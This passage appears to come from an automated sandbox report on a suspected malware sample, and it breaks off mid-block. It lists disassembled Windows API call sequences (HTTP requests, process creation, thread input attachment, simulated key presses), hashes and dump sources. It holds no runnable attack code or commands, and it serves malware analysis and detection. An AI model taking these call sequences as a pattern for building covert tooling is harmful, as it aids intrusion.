                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                            • String ID: Ping
                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                            • Opcode ID: b509886b40da110e42b333b7e4f401c4f5e040c11fdc25af6408e7d4d568fce3
                                                                                                                            • Instruction ID: 00cfa7c948152cdf17a36eee1552b25d9b17ef84aea0282db1ac5cdcc40ed3b7
                                                                                                                            • Opcode Fuzzy Hash: b509886b40da110e42b333b7e4f401c4f5e040c11fdc25af6408e7d4d568fce3
                                                                                                                            • Instruction Fuzzy Hash: 97518171A047049FDB10DF25DC55B2A7BE4EF49B21F048929FA56EB2A1DB70EC08EB41
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F4B4D0
                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F4B546
                                                                                                                            • GetLastError.KERNEL32 ref: 00F4B550
                                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00F4B5BD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                            • Opcode ID: 7aad55acfaff47de1f5e9d8d274162f9e650db1a7ba8f106fc7a0972e0718555
                                                                                                                            • Instruction ID: 37de07cf077a92d52aef20411a7443361bbe28a01be6d7870e6e66edf56f2b51
                                                                                                                            • Opcode Fuzzy Hash: 7aad55acfaff47de1f5e9d8d274162f9e650db1a7ba8f106fc7a0972e0718555
                                                                                                                            • Instruction Fuzzy Hash: 3831B235A00209DFDB00EF68D845EBDBBB4FF49350F184025E905E7296DB71DA02EB41
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F39014
                                                                                                                            • GetDlgCtrlID.USER32 ref: 00F3901F
                                                                                                                            • GetParent.USER32 ref: 00F3903B
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F3903E
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00F39047
                                                                                                                            • GetParent.USER32(?), ref: 00F39063
                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F39066
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                            • Opcode ID: d9a6b147abf76b60b75843b3269798b669b409b6f5e94e082bec265c58b56df5
                                                                                                                            • Instruction ID: a29a38b1cae8f81c522b666d91d09cbee173ba2ba0e84e494fa39a1eff9b299a
                                                                                                                            • Opcode Fuzzy Hash: d9a6b147abf76b60b75843b3269798b669b409b6f5e94e082bec265c58b56df5
                                                                                                                            • Instruction Fuzzy Hash: 6821A775A04208BBDF05ABA1CC85EFEB7B5EF45320F100115F571972A1DBB55819EA21
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F390FD
                                                                                                                            • GetDlgCtrlID.USER32 ref: 00F39108
                                                                                                                            • GetParent.USER32 ref: 00F39124
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F39127
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00F39130
                                                                                                                            • GetParent.USER32(?), ref: 00F3914C
                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F3914F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                            • Opcode ID: 3151fbe3c9451560e307cb77a8af736713fbc865f6630a63b9503060aa337eec
                                                                                                                            • Instruction ID: 011f44cfd9c9b86add272ec28cff98490c665d977c6e2f14a827b7ebd894236b
                                                                                                                            • Opcode Fuzzy Hash: 3151fbe3c9451560e307cb77a8af736713fbc865f6630a63b9503060aa337eec
                                                                                                                            • Instruction Fuzzy Hash: F121B875E04208BBDF05ABA5CC85EFEB7B4EF45310F104015F561A72A1DBB55819EA21
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32 ref: 00F3916F
                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00F39184
                                                                                                                            • _wcscmp.LIBCMT ref: 00F39196
                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F39211
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                            • API String ID: 1704125052-3381328864
                                                                                                                            • Opcode ID: ebae0bfa63c553119610ceb78796ff5bbdfb3d766621150be2273124156139f5
                                                                                                                            • Instruction ID: 4f613b0387c9898263baf0d6f4806e51477bcff1edcd8b969983b6bb7d2cb2bf
                                                                                                                            • Opcode Fuzzy Hash: ebae0bfa63c553119610ceb78796ff5bbdfb3d766621150be2273124156139f5
                                                                                                                            • Instruction Fuzzy Hash: C711A33669C707BAFA113624EC0ADA7379CDB15730F200026F910E54E1EEE6E95179A5
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F588D7
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F58904
                                                                                                                            • CoUninitialize.OLE32 ref: 00F5890E
                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00F58A0E
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F58B3B
                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F72C0C), ref: 00F58B6F
                                                                                                                            • CoGetObject.OLE32(?,00000000,00F72C0C,?), ref: 00F58B92
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00F58BA5
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F58C25
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F58C35
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F47A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F411F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F41204
• GetWindowThreadProcessId.USER32(00000000), ref: 00F4120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F40268,?,00000001), ref: 00F4121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F40268,?,00000001), ref: 00F41245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F40268,?,00000001), ref: 00F41257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F4129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F412B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F40268,?,00000001), ref: 00F412BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• GetSysColor.USER32(00000008), ref: 00EE2231
• SetTextColor.GDI32(?,000000FF), ref: 00EE223B
• SetBkMode.GDI32(?,00000001), ref: 00EE2250
• GetStockObject.GDI32(00000005), ref: 00EE2258
• GetClientRect.USER32(?), ref: 00F1BDBB
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00F1BDD2
• GetWindowDC.USER32(?), ref: 00F1BDDE
• GetPixel.GDI32(00000000,?,?), ref: 00F1BDED
• ReleaseDC.USER32(?,00000000), ref: 00F1BDFF
• GetSysColor.USER32(00000005), ref: 00F1BE1D
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EEFAA6
• OleUninitialize.OLE32(?,00000000), ref: 00EEFB45
• UnregisterHotKey.USER32(?), ref: 00EEFC9C
• DestroyWindow.USER32(?), ref: 00F245D6
• FreeLibrary.KERNEL32(?), ref: 00F2463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F24668
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• EnumChildWindows.USER32(?,00F3A439), ref: 00F3A377
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00EE2EAE
  • Part of subcall function 00EE1DB3: GetClientRect.USER32(?,?), ref: 00EE1DDC
  • Part of subcall function 00EE1DB3: GetWindowRect.USER32(?,?), ref: 00EE1E1D
  • Part of subcall function 00EE1DB3: ScreenToClient.USER32(?,?), ref: 00EE1E45
• GetDC.USER32 ref: 00F1CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F1CD45
• SelectObject.GDI32(00000000,00000000), ref: 00F1CD53
• SelectObject.GDI32(00000000,00000000), ref: 00F1CD68
• ReleaseDC.USER32(?,00000000), ref: 00F1CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F1CDFB
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F51A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F51A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F51ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F51AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F51AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F51B10
• InternetCloseHandle.WININET(00000000), ref: 00F51B57
  • Part of subcall function 00F52483: GetLastError.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F52498
  • Part of subcall function 00F52483: SetEvent.KERNEL32(?,?,00F51817,00000000,00000000,00000001), ref: 00F524AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2603140658-3916222277
                                                                                                                            • Opcode ID: 6321cdc944941afca91b50d9f63feda8a2f62bccb92543e9f0d154e6c76cabee
                                                                                                                            • Instruction ID: d8b4d70459edd4795faa3ae4ab5238149a8ac328377071a85d2d3cb3cca34178
                                                                                                                            • Opcode Fuzzy Hash: 6321cdc944941afca91b50d9f63feda8a2f62bccb92543e9f0d154e6c76cabee
                                                                                                                            • Instruction Fuzzy Hash: B54185B1901219BFEB118F50CC85FBB776CFF49355F004126FE159A141E7B4AD48ABA0
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F6F910), ref: 00F58D28
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F6F910), ref: 00F58D5C
                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F58ED6
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00F58F00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560350794-0
                                                                                                                            • Opcode ID: ca05fa739468027ed86fe8e9667dbff41a33cedaf053f2503f50ddb94a5c3857
                                                                                                                            • Instruction ID: fd4c437db0bfb34b140c01570fd6b51a229f09c80b3d4b28b0098866c2d57491
                                                                                                                            • Opcode Fuzzy Hash: ca05fa739468027ed86fe8e9667dbff41a33cedaf053f2503f50ddb94a5c3857
                                                                                                                            • Instruction Fuzzy Hash: 2AF15C71A00109EFCF04DFA4C884EAEB7B9FF49355F108458FA15AB251DB71AE4ADB50
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F5F6B5
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F848
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F86C
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F8AC
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F5F8CE
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F5FA4A
                                                                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F5FA7C
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F5FAAB
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F5FB22
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4090791747-0
                                                                                                                            • Opcode ID: 3cad84fa570052c4f84bc08c2d74c0a2cb602a8c4bf1a2f110eea6521cc14b94
                                                                                                                            • Instruction ID: 24905ea4d924afce9bd7a9188164312674380e76c13879ec0ced4997a43a2655
                                                                                                                            • Opcode Fuzzy Hash: 3cad84fa570052c4f84bc08c2d74c0a2cb602a8c4bf1a2f110eea6521cc14b94
                                                                                                                            • Instruction Fuzzy Hash: C7E1E3316043459FC714EF24D881B6ABBE1EF85320F1484ADFD999B2A2CB34DC49EB52
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F43697,?), ref: 00F4468B
                                                                                                                              • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F43697,?), ref: 00F446A4
                                                                                                                              • Part of subcall function 00F44A31: GetFileAttributesW.KERNEL32(?,00F4370B), ref: 00F44A32
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F44D40
                                                                                                                            • _wcscmp.LIBCMT ref: 00F44D5A
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F44D75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 793581249-0
                                                                                                                            • Opcode ID: fa84ac71ee2176de0c23ad6f1b00c5686cdfc95d93c9d5948a1b93c8425a062c
                                                                                                                            • Instruction ID: 8f9eb4b9b2a9e3e5b6a00664941fa5a4400b4875f92ba50fc9329bbe419e730c
                                                                                                                            • Opcode Fuzzy Hash: fa84ac71ee2176de0c23ad6f1b00c5686cdfc95d93c9d5948a1b93c8425a062c
                                                                                                                            • Instruction Fuzzy Hash: 835153B24083859BC764DB90DC81ADFB7ECAF85350F00092EB685D3191EF35B588D766
                                                                                                                            APIs
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F686FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634782764-0
                                                                                                                            • Opcode ID: c08c2de13c3e519c5f68f0f0b13b09cb5f06b1a1471033c0259e28b3777c2051
                                                                                                                            • Instruction ID: 128bbbd12c3731078e56e9414d29a4805132b2e5e79b8df0d79e44a46eb21465
                                                                                                                            • Opcode Fuzzy Hash: c08c2de13c3e519c5f68f0f0b13b09cb5f06b1a1471033c0259e28b3777c2051
                                                                                                                            • Instruction Fuzzy Hash: 3F519331900248BFDB209F24DC85F9D7BA4AB057A0F604319FA51E71A1CFB6AD81FB51
                                                                                                                            APIs
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F1C2F7
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F1C319
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F1C331
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F1C34F
                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F1C370
                                                                                                                            • DestroyIcon.USER32(00000000), ref: 00F1C37F
                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F1C39C
                                                                                                                            • DestroyIcon.USER32(?), ref: 00F1C3AB
                                                                                                                              • Part of subcall function 00F6A4AF: DeleteObject.GDI32(00000000), ref: 00F6A4E8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2819616528-0
                                                                                                                            • Opcode ID: 8cc618cf0d3fd282463c0123f307df5332161dbe7faf87ab9dd32c857fd24bd3
                                                                                                                            • Instruction ID: 82218b2e4562bc2929c39ace7aef59d72da477b23233b5680c187fc305af18af
                                                                                                                            • Opcode Fuzzy Hash: 8cc618cf0d3fd282463c0123f307df5332161dbe7faf87ab9dd32c857fd24bd3
                                                                                                                            • Instruction Fuzzy Hash: 90515E70A40249AFDB20DF65DC45FAA77A9FB44720F10452CFA52A72A0D7B0AD90EB90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3A84C
                                                                                                                              • Part of subcall function 00F3A82C: GetCurrentThreadId.KERNEL32 ref: 00F3A853
                                                                                                                              • Part of subcall function 00F3A82C: AttachThreadInput.USER32(00000000,?,00F39683,?,00000001), ref: 00F3A85A
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F3968E
                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F396AB
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F396AE
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F396B7
                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F396D5
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F396D8
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F396E1
                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F396F8
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F396FB
                                                                                                                            Memory Dump Source
